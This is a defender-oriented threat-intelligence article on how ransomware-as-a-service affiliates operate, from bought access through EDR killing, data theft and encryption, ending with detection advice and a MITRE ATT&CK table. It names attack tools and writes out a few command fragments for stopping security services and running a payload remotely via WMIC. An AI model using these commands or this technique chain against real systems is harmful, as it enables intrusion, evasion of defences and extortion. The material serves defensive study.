The RaaS model separates two functions that were once combined in a single criminal group: the operators who build and maintain the platform, and the affiliates who execute the attacks. Operators handle ransomware development, infrastructure, leak sites, payment processing, and negotiation support. Affiliates bring the intrusion skills — target selection, initial access, lateral movement, data exfiltration, and ransomware deployment. They keep 70–85% of each ransom payment. The operator takes the rest.
This division of labor has produced a highly optimized, repeatable attack methodology. Affiliates are not improvising. They are running a structured playbook that has been refined through thousands of successful intrusions, shared through underground forums and affiliate panels, and continuously updated as defensive capabilities evolve. The same techniques appear across unrelated RaaS brands because affiliates move between platforms — and they bring their tradecraft with them.
This article traces the full affiliate attack chain from initial access acquisition through ransom deployment, with specific attention to the techniques, tools, and detection signals at each phase.
Phase 1: Initial Access — How They Get In
Initial access is the one phase affiliates have become increasingly willing to outsource. The ecosystem of Initial Access Brokers — specialists who compromise networks and sell the foothold to others — has grown into a mature, industrialized market that fundamentally changes the economics of ransomware operations.
The Initial Access Broker market
IABs focus exclusively on the hardest part of the attack: getting through the perimeter. Once inside, they establish persistent backdoors, enumerate the environment to assess its value, and then list the access on dark web forums including Exploit, XSS, RAMP, and Breach Forums — or sell it directly to affiliated ransomware operators through private arrangements. The price of access varies based on victim revenue, geography, sector, and the level of privilege obtained. Listings that include domain administrator access command higher prices; routine VPN foothold access has grown cheaper as the market has scaled.
The most significant recent shift is IABs working exclusively for specific RaaS platforms or affiliate groups rather than listing publicly. This direct relationship eliminates the public forum advertising that creates law enforcement visibility, gives the IAB a steady revenue stream, and allows affiliates to move from access procurement to active intrusion with minimal delay. The broker gains access, the affiliate receives it, and the clock starts running on the attack timeline — sometimes within hours of the initial compromise.
IAB access listings have drifted downward in average price as supply has increased. Many mid-sized corporate network footholds now trade for under $1,000 on open forums. High-value targets with domain admin access, large revenue, and critical sectors still command tens of thousands. The low baseline cost means affiliates can acquire and test access across many targets simultaneously, abandoning low-yield environments for better ones — the same model any sales team uses to qualify leads.
Direct initial access techniques
When affiliates or their associated IABs acquire access directly rather than purchasing it, they lean heavily on three primary vectors, in order of documented frequency:
Exposed remote access infrastructure. VPN appliances and RDP services remain the dominant entry point for ransomware affiliates. Specific devices targeted repeatedly in 2024–2025 include Cisco VPN infrastructure (CVE-2020-3259, CVE-2023-20269), SonicWall SMA and SSL VPN devices (CVE-2024-40766), Fortinet FortiGate, and Citrix NetScaler (CVE-2023-3519). These vulnerabilities are often paired with stolen or brute-forced credentials, and frequently exploited where MFA is absent or misconfigured. Affiliates actively monitor newly disclosed vulnerabilities and instrument their tooling to exploit them within days of public disclosure — often before most organizations can patch.
Credential theft and infostealer logs. A substantial portion of initial access in 2025 came not from exploitation but from credential theft — specifically, credentials harvested by infostealer malware (Redline, Vidar, Lumma Stealer, and related families) that infected endpoints through phishing, malvertising, or trojanized software downloads. These stolen credentials, sold in bulk on underground markets or in dedicated Telegram channels, provide VPN credentials, email session tokens, SaaS login pairs, and in some cases local admin passwords that grant direct access to corporate resources. Bitdefender's late 2025 analysis noted a growing shift among ransomware actors toward identity-first compromise — prioritizing credential theft over active exploitation because it is quieter, cheaper, and harder to detect.
Vulnerability exploitation. For high-value targets, affiliates directly exploit public-facing applications — web servers, email gateways, file transfer appliances, and ERP systems. The Oracle EBS zero-day (CVE-2025-61882) and the SharePoint vulnerabilities (CVE-2025-53770, CVE-2025-53771) used in 2025 ransomware campaigns are examples of this pattern. The sophistication required varies widely: some affiliates exploit simple misconfigurations or well-known n-day vulnerabilities against unpatched systems; more capable operators develop or acquire zero-days against enterprise software used by large-revenue targets.
Phase 2: Living Off the Land — Staying Invisible Inside the Network
Once an affiliate has a foothold, their primary operational concern is not moving fast — it is staying hidden. The noisiest part of a ransomware attack, the encryption phase, comes last. Before that, affiliates spend days or weeks mapping the environment, escalating privileges, stealing credentials, and exfiltrating data. All of that work uses, wherever possible, tools that already exist on the system.
Living-off-the-land (LOTL or LOLBins) attacks use legitimate operating system binaries and administrative tools for malicious purposes. PowerShell, Windows Management Instrumentation (WMI), PsExec, Robocopy, certutil, bitsadmin, net, wevtutil, and dozens of others are native to every Windows environment. Because they are trusted by default and generate traffic and logs that look like normal administrative activity, they bypass signature-based detection and do not trigger file-reputation checks. There is no malicious binary to hash. There is no known-bad process to alert on. The attack looks like an administrator doing administrator things.
"Nearly every significant incident we investigate — from ransomware to APTs — leverages living-off-the-land techniques. In ransomware, while attention is often on the final data encryption, the attack's core is a manual hacking operation conducted by affiliates." — Bitdefender TechZone
PowerShell appears in approximately 71% of LOTL attacks in documented telemetry. Its remote execution features, scripting flexibility, and ability to execute code directly in memory without writing files to disk make it the preferred multi-stage attack vehicle. WMI provides lateral movement and persistence mechanisms. certutil.exe and bitsadmin.exe download and execute payloads from remote servers. wevtutil.exe clears event logs. schtasks.exe and sc.exe create persistence through scheduled tasks and services. net.exe enumerates users, groups, and network shares. The combination of these native tools, chained together in sequences that mirror legitimate administrative workflows, allows affiliates to operate extensively inside a compromised environment before any detection mechanism fires.
Alongside LOTL techniques, affiliates routinely deploy legitimate remote access and administration tools that are commercial off-the-shelf products: AnyDesk, TeamViewer, Splashtop, RustDesk, and similar platforms are installed on compromised systems to provide persistent, easy-to-use remote access that blends with normal IT operations. These tools are particularly useful for affiliates who work with IABs — the IAB may install a remote access tool and hand off the session, allowing the affiliate to take over without ever touching the original compromise vector.
Credential harvesting inside the network
Once inside, one of the first priorities is credential escalation. Affiliates use a combination of techniques depending on what they find:
- Mimikatz and LSASS dumping — extracting plaintext passwords and NTLM hashes from memory. While Mimikatz itself is widely detected, affiliates frequently use modified variants, obfuscated copies, or alternative tools with the same functionality.
- Kerberoasting — requesting service tickets for accounts with Service Principal Names set, then cracking the tickets offline to recover passwords without touching the domain controller directly.
- Pass-the-hash / Pass-the-ticket — using captured NTLM hashes or Kerberos tickets to authenticate to other systems without knowing the actual plaintext password.
- Impacket tools — secretsdump, psexec, wmiexec, and related scripts for remote credential dumping and lateral movement over legitimate protocols.
- Infostealer deployment — dropping commodity infostealers (Vidar, RedLine) inside the network to harvest browser-stored credentials, saved passwords, and session tokens from additional endpoints.
Phase 3: Lateral Movement — Expanding the Foothold
Lateral movement is where the initial foothold becomes an environment-wide compromise. Affiliates typically move toward domain controller access as quickly as possible, because domain administrator credentials allow them to deploy the ransomware payload simultaneously to every machine in the domain via Group Policy or PsExec batch execution.
The primary protocols used for lateral movement are RDP (Remote Desktop Protocol), SMB (Server Message Block), WMI, and PowerShell Remoting — all legitimate administrative channels that generate high volumes of normal traffic in any enterprise environment. Affiliates blend their lateral movement traffic into this background noise, sometimes deliberately mimicking the timing and volume patterns of legitimate administrator activity.
Specific tools consistently observed across affiliate intrusions include PsExec for remote process execution across SMB, Cobalt Strike for post-exploitation command-and-control with beaconing that mimics normal HTTPS traffic, and Impacket's suite of Python tools for SMB and Kerberos-based lateral movement. In environments running VMware ESXi, affiliates increasingly target hypervisor management interfaces directly — encrypting VM disk files on the hypervisor allows simultaneous disabling of hundreds of virtual machines in a single operation, producing maximum disruption with minimal payload deployment effort.
Across multiple investigations, Akira affiliates moved from initial access to domain-level control within hours to a few days. The tight timeline reflects both the efficiency of the LOTL and credential-based lateral movement techniques and the operational pressure affiliates face — extended dwell time increases detection risk and reduces the return on each access. Once domain admin credentials are in hand, the affiliate typically moves quickly toward exfiltration and deployment.
Phase 4: EDR Evasion — Killing the Watchdog Before Detonation
Before the ransomware payload executes, affiliates need to disable or neutralize endpoint detection and response tools. An active EDR agent that catches the encryptor and quarantines it means the affiliate loses the deployment and potentially burns the access. EDR killers — tools specifically designed to disable security software — have become a standard component of every modern ransomware intrusion.
Bring Your Own Vulnerable Driver (BYOVD)
BYOVD is the dominant technique for EDR termination because it operates below the level where EDR self-protection mechanisms can intervene. The attack exploits a fundamental property of Windows: to protect the kernel, Microsoft requires that kernel-mode drivers carry valid digital signatures. But millions of legacy signed drivers contain vulnerabilities. These drivers can be loaded by any local administrator using standard Windows commands — their valid signatures ensure Windows permits it — and their vulnerabilities can then be exploited to gain kernel-level privileges.
From kernel space (Ring 0), the attacker can enumerate and terminate any process on the system, unregister the kernel callbacks that EDR agents use to monitor process creation and file operations, and modify kernel data structures in ways that make EDR agents functionally blind. The EDR software appears to still be running, but it has lost the ability to observe or intercept malicious activity. The encryptor then executes in an environment the EDR can no longer protect.
Documented vulnerable drivers abused in ransomware operations include the RTCore64.sys driver from MSI Afterburner (used by BlackCat affiliates), gaming anti-cheat drivers including mhyprot2.sys from Genshin Impact (packaged alongside multiple ransomware loaders in 2024–2025), and dozens of legitimate hardware utility drivers from motherboard and GPU manufacturers. A public GitHub repository called BlackSnufkin's BYOVD, regularly maintained with PoC implementations for ten vulnerable drivers, is documented as the most frequently used source of driver exploitation code in live ransomware attacks. The Warlock ransomware gang deploys dozens of EDR killers per intrusion until one succeeds — recent samples show code patterns consistent with AI-assisted development, accelerating the creation of new variants.
A significant development in late 2025 and early 2026 is the compression of the BYOVD deployment into a single stage. Previously, affiliates had to first load the vulnerable driver, then execute a separate EDR killer tool — two distinct steps with two detection windows. Newer ransomware families are embedding the vulnerable driver directly within the ransomware payload, so EDR termination and payload execution occur in near-simultaneous operations. The Reynolds ransomware, observed in February 2026, embedded a vulnerable NsecSoft NSecKrnl driver (CVE-2025-68947) directly within the payload, eliminating the separate deployment step entirely.
Beyond BYOVD: Other EDR killer approaches
BYOVD is not the only EDR killer technique in the affiliate toolkit. ESET researchers have tracked nearly 90 EDR killer tools in active use, reflecting the diversity of approaches affiliates deploy:
- Anti-rootkit abuse — legitimate anti-rootkit utilities that expose kernel-level process termination capabilities are repurposed to kill EDR agents. These tools carry legitimate vendor signatures and may not trigger BYOVD-specific detection rules.
- EDRSilencer and similar driverless tools — instead of terminating the EDR process, these tools block communication between the endpoint agent and its cloud-based security backend. The agent remains running but cannot report detections, receive updates, or trigger automated responses. ESET documented rapid adoption of EDRSilencer by ransomware actors within days of the tool's release.
- EDRKillShifter — a custom EDR killer developed by RansomHub operators and provided to their affiliates as part of the platform tooling. RansomHub is the only documented RaaS platform known to have provided affiliates with a proprietary EDR killer rather than relying on public tools.
- Script-based killers using LOLBins — service stop commands (
sc stop), process kill commands (taskkill), and WMI process deletion (wmic process where name=… delete) blended with LOLBin activity to disable security services without triggering BYOVD-specific detection. These are less reliable against hardened agents but remain effective against organizations with weaker security configurations.
Affiliates, not operators, choose their EDR killers. The same driver appears across unrelated tooling, and the same tool migrates between different ransomware brands as affiliates carry their toolkits from one platform to another. This cross-group tooling sharing makes driver-based attribution to specific groups unreliable. If your EDR detects an EDR killer attempt, the relevant information for defensive response is the technique — kernel-assisted driver loading — not which brand's operator presumably distributed the tool.
Phase 5: Data Exfiltration — Stealing Before Encrypting
Double extortion — the combination of ransomware encryption with the threat to publish stolen data — has become the dominant ransomware model. But the order of operations matters: exfiltration happens before encryption in more than 70% of ransomware attacks, according to Huntress's 2025 Cyber Threat Report. Data leaves the network while the organization still has no idea it has been compromised. By the time the ransom note appears, the leverage is already established.
Affiliates stage data for exfiltration by aggregating files of interest — financial records, customer data, employee records, intellectual property — into a collection point inside the network before transferring them externally. Common staging and exfiltration tools observed across affiliate intrusions include:
- Rclone — a legitimate cloud storage sync tool that affiliates configure to send data to attacker-controlled cloud storage accounts (Mega, pCloud, or anonymous S3 buckets). Rclone traffic is encrypted and looks like normal cloud sync activity.
- WinRAR and 7-Zip — for compressing and archiving staged data before exfiltration, often paired with password protection to prevent defenders from easily inspecting the archive if it is detected in transit.
- FileZilla and fzsftp.exe — for SFTP-based exfiltration to attacker servers.
- Ngrok — a tunneling tool that exposes internal services to the internet through encrypted tunnels, bypassing perimeter firewall inspection. Used both for exfiltration and for establishing persistent C2 channels.
- LOLBin exfiltration — native utilities including
bitsadmin.exe(background file transfers),robocopy.exe(bulk file copying to network shares),ftp.exe, and evenfinger.exe(documented by Huntress as used to exfiltrate process listings) — all legitimate tools that blend with normal operations. - Cloud drive abuse — using corporate-authorized cloud platforms (Google Drive, OneDrive, Dropbox) as exfiltration channels, exploiting the fact that traffic to these platforms is typically allowed and encrypted, making content inspection difficult. Crypto24 ransomware operators used Google Drive for this purpose.
The shift toward data-only extortion — where affiliates exfiltrate data and demand payment without ever deploying encryption — represents an evolution away from the most detectable phase of the attack. If the encryptor never runs, there is no encryption event to detect, no sudden file modification storm, and no ransomware note. The organization discovers the breach only when the extortion email arrives or when the data appears on a leak site. Backup strategies that defend against encryption do nothing to address this model.
Phase 6: Ransomware Deployment — The Finale
By the time the affiliate deploys the ransomware encryptor, they have typically completed all preparatory work: perimeter foothold established, domain admin credentials obtained, EDR killed or blinded, backup infrastructure targeted, and valuable data exfiltrated. The encryption phase is designed to be rapid and simultaneous across as many systems as possible, maximizing operational disruption before the organization can respond.
Ransomware is deployed in several ways depending on the environment and the level of access obtained:
- Group Policy Object (GPO) deployment — using domain admin access to push the ransomware payload to all domain-joined machines simultaneously via Group Policy. This is the highest-impact deployment method and the reason affiliates prioritize domain admin access above all other escalation targets.
- PsExec batch execution — running the ransomware binary on a list of target hosts via PsExec over SMB. Slower than GPO but achievable with lower privilege levels and useful for targeting specific high-value systems.
- VMware ESXi direct targeting — affiliates with access to ESXi hypervisor management interfaces execute the Linux or ESXi-specific ransomware variant to encrypt VM disk files (
.vmdk,.vmx) directly on the hypervisor. This can take down hundreds of VMs in a single operation without ever touching the guest operating systems. - WMIC remote execution —
wmic /node:TARGET process call create "payload.exe"allows remote execution using captured credentials, leaving limited forensic artifacts compared to PsExec.
Modern ransomware payloads are increasingly cross-platform, with separate builds for Windows, Linux, and ESXi environments reflecting the mixed infrastructure of enterprise targets. LockBit 5.0, released September 2025, introduced dedicated payloads for all three platforms with enhanced defense evasion using XChaCha20 and Curve25519 encryption routines. Payloads are typically compiled per victim to change hashes, reducing the effectiveness of hash-based IOC lists.
What This Means for Defenders
Understanding the affiliate playbook as a sequential chain — rather than as a collection of independent threats — changes what defensive investments matter most and when they need to intercept the attack.
The most important insight from documented affiliate tradecraft is that the encryption event is the last thing that happens, not the first thing to defend against. Organizations whose primary defensive strategy centers on detecting or recovering from ransomware encryption have already ceded the most consequential phase of the attack — data exfiltration — to the affiliate. By the time encryption fires, the extortion leverage is already established regardless of whether the backup strategy succeeds.
The highest-value defensive interventions occur earlier in the chain:
At initial access: Enforce phishing-resistant MFA on all VPN, RDP, and remote access infrastructure — the access credential that bypasses MFA cannot be purchased from an IAB. Maintain aggressive patch cadence for perimeter devices. Monitor for credential leaks in infostealer logs (many services exist to alert on corporate credential exposure in underground markets). Treat any authentication from an unusual IP, geographic location, or device fingerprint as a priority investigation, not a low-priority alert.
At credential theft and lateral movement: Baseline and monitor Kerberos ticket issuance and service account authentication. Alert on unusual use of Impacket-related traffic patterns and secretsdump behaviors. Restrict lateral movement protocols — block SMB and RDP between workstations that have no business need to communicate directly. Monitor for new scheduled tasks and services created outside of change management windows. Log PowerShell ScriptBlock logging and constrained language mode to increase detection coverage on LOLBin abuse.
At EDR evasion: Treat an EDR killer attempt as a highest-priority incident indicator, not as an isolated alert. If an affiliate is attempting to blind your EDR, ransomware deployment is likely minutes away. Enable Hypervisor-protected Code Integrity (HVCI) to block vulnerable driver loading where compatible hardware allows. Monitor for unexpected driver load events and maintain updated vulnerable driver blocklists. Validate that EDR tamper protection is active and that agents cannot be stopped by local administrator commands.
At exfiltration: Detect anomalous bulk data movement — large volumes of file copy operations, unusual Rclone or cloud sync activity, archive tool usage outside of normal business patterns, and outbound connections to unfamiliar endpoints. Data Loss Prevention controls on sensitive data categories provide an additional layer of detection. Network egress monitoring catches what endpoint tools miss when an affiliate uses legitimate cloud platforms as exfiltration channels.
The affiliate playbook is deliberately built around techniques that look like legitimate administrative activity at each individual step. PowerShell execution, WMI queries, RDP connections, cloud sync, scheduled task creation — all of these happen constantly in well-managed environments. Detection requires behavioral baselining and anomaly detection, not signature matching. The question is never "is this tool malicious?" It is always "is this the right tool used in the right way by the right account at the right time?"
The Affiliate Playbook: Phase Reference
| Phase | Common Tools & Techniques | MITRE ATT&CK | Key Detection Signal |
|---|---|---|---|
| Initial Access | VPN/RDP exploitation, IAB-purchased access, infostealer credentials, phishing | T1190, T1078, T1566 | Auth from unexpected location / device; credential in infostealer feed; VPN auth without MFA |
| Persistence | Scheduled tasks, services, RMM tools (AnyDesk, TeamViewer), registry run keys | T1053, T1543, T1547 | New scheduled task / service outside change window; unexpected RMM install; registry modification |
| Credential Access | Mimikatz / LSASS dump, Kerberoasting, secretsdump, infostealers, pass-the-hash | T1003, T1558.003, T1550.002 | LSASS access by non-system process; anomalous SPN ticket requests; secretsdump traffic pattern |
| Discovery | net.exe, nltest, PowerShell AD modules, BloodHound, ADRecon | T1018, T1069, T1087 | Burst of AD enumeration commands; BloodHound collection activity; unusual domain controller queries |
| Lateral Movement | PsExec, WMI, Impacket, RDP, Cobalt Strike, PowerShell Remoting | T1021, T1047, T1570 | Workstation-to-workstation SMB/RDP; PsExec from unusual source; anomalous WMI remote execution |
| Defense Evasion | BYOVD, EDRKillShifter, EDRSilencer, KillAV tools, wevtutil log clearing, process injection | T1562.001, T1068, T1014 | Unexpected driver load; security process termination; event log clearing; EDR agent going silent |
| Exfiltration | Rclone, WinRAR/7-Zip, FileZilla, Ngrok, bitsadmin, robocopy, cloud drive abuse | T1048, T1567, T1041 | Large outbound data transfer; Rclone or cloud sync to unknown endpoint; archive tool execution; Ngrok tunnel |
| Impact | GPO deployment, PsExec batch, ESXi direct targeting, WMIC remote exec, backup deletion (vssadmin, wbadmin) | T1486, T1490, T1489 | Mass file modification events; shadow copy deletion; GPO change pushing executables; service mass-stop |
Key Takeaways
- The playbook is shared, not group-specific. Affiliates carry their tradecraft between platforms. The same LOTL techniques, credential theft tools, and BYOVD drivers appear in intrusions attributed to different RaaS brands because the same affiliates are running them. Defending against the technique is more durable than defending against a specific group's known IOCs.
- IABs have industrialized the hardest part of the attack. Affiliates no longer need to compromise the perimeter themselves. Access is a purchasable commodity, with corporate network footholds trading for as little as a few hundred dollars. The initial access problem is no longer primarily a malware problem — it is an exposure management and credential protection problem.
- Living off the land is not a sophistication indicator. The same tools used by experienced affiliates are used by low-skill affiliates because the tools are freely available, well-documented, and trusted by default. An attacker using only PowerShell, WMI, and PsExec is not necessarily less dangerous than one deploying custom malware — they may be harder to detect.
- BYOVD has crossed from advanced to standard. EDR killers using kernel-level driver abuse are documented in commodity ransomware operations, not just advanced groups. The February 2026 shift to embedding the vulnerable driver within the ransomware payload itself compresses the detection window further. Organizations should validate their kernel driver protection controls proactively, not after an incident.
- Exfiltration precedes encryption in more than 70% of attacks. Backup and recovery strategies are necessary but not sufficient. A successful restore after ransomware does not prevent the data extortion leverage that was established before encryption. Data exfiltration detection — anomalous bulk transfers, unexpected cloud sync activity, archive tool usage — needs to be a first-class detection priority, not an afterthought.
- Detection requires behavioral analysis, not signature matching. Every phase of the affiliate playbook uses legitimate tools. Effective detection is behavioral: baselining what normal looks like for each account, protocol, and data flow in your environment, and alerting on deviations — not on the presence of a specific binary.